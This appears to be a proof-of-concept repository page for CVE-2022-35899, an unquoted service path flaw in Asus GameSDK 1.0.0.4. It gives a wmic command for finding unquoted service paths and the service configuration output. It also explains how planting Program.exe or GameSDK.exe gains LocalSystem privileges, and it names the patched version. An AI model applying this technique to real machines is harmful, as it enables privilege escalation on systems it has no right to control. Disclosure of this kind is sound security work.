CVE-2022-35899 PoC — ASUS GameSDK 代码问题漏洞

Source

Associated Vulnerability

Description

Unquoted Service Path Asus GameSdk

Readme

# CVE-2022-35899
Unquoted Service Path Asus GameSdk

# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0

# Step to discover the unquoted service path:
```
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
```

# Info on the service:

```
C:\>sc qc "GameSDK Service"

[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

```

# Exploit
If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".

# Impact
An attacker can elevate his privileges on the system.

# POC Video
https://youtu.be/u_8JMIgn-5g

File Snapshot

 [4.0K]  /data/pocs/c7c31fc8d764cb4f839a1e0a4b36bd239acd0d81
└── [1.5K]  README.md

0 directories, 1 file

Remarks